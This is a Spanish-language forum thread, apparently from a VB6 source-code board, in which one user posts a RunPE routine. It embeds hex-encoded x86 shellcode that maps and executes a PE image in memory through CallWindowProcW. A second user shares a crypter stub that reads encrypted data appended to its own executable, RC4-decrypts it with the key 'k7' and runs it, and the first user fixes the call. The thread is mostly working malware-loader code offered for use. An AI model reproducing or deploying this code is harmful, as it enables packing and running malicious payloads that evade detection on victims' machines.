Bueno aquí este RunPE basado con el shellcode de covetous.eyes.

' =================================================================
' =================================================================
' => Autor: Pink
' => RunPE ASM en Linea
' => Uso RunPE(Puntero Base Ejecutable) 'Pointer PE Image
' => Fecha : 30|04|2013
' => Todos los Creditos para covetous.eyes
' => Requisitos: Ejecutable debe tener tabla de relocalizaciones | PE Image must have  relocation table
' =================================================================
' =================================================================
 
 
Option Explicit
 
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
 
 
Public Function RunPE(PE_Puntero As Long)
Dim OP_Array() As Byte
Dim Str_OP  As String
Dim i As Long
 
Str_OP = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
      "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
      "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
      "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
      "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
      "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
      "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
      "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
      "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
      "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
      "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
      "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
      "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
      "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
      "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
      "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
      "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
      "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
      "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
      "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
      "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
      "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
      "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
      "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
      "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"

 
ReDim OP_Array((Len(Str_OP) / 2) - 1)
For i = 1 To Len(Str_OP) - 1 Step 2
OP_Array(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
Next
 
CallWindowProcW VarPtr(OP_Array(0)), PE_Puntero, 0, 0, 0
 

 
End Function

saludos
Imagen
Gracias Pink , la verdad tengo problemas para llamarlo , a ver si me das una mano

Código: Seleccionar todo

Sub Main()

Dim Yo As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1


sData() = Split(Datos, "////")

sData(1) = RC4(sData(1), "k7")

Injec yo,strconv(sData(1),vbFromUnicode),vbNullString

End sub
Malware = 00011B
K7 escribió:Gracias Pink , la verdad tengo problemas para llamarlo , a ver si me das una mano

Código: Seleccionar todo

Sub Main()

Dim Yo As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1


sData() = Split(Datos, "////")

sData(1) = RC4(sData(1), "k7")

Injec yo,strconv(sData(1),vbFromUnicode),vbNullString

End sub

es así

Sub Main()

Dim Yo As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe"

Open YO For Binary As #1
Datos = Space(LOF(1))
Get #1, , Datos
Close #1


sData() = Split(Datos, "////")

sData(1) = RC4(sData(1), "k7")

RunPE(VarPtr(sData(0)))

End sub
PD: recuerda que tenga tabla de relocalizaciones
saludos
Imagen
Responder

Volver a “Fuentes”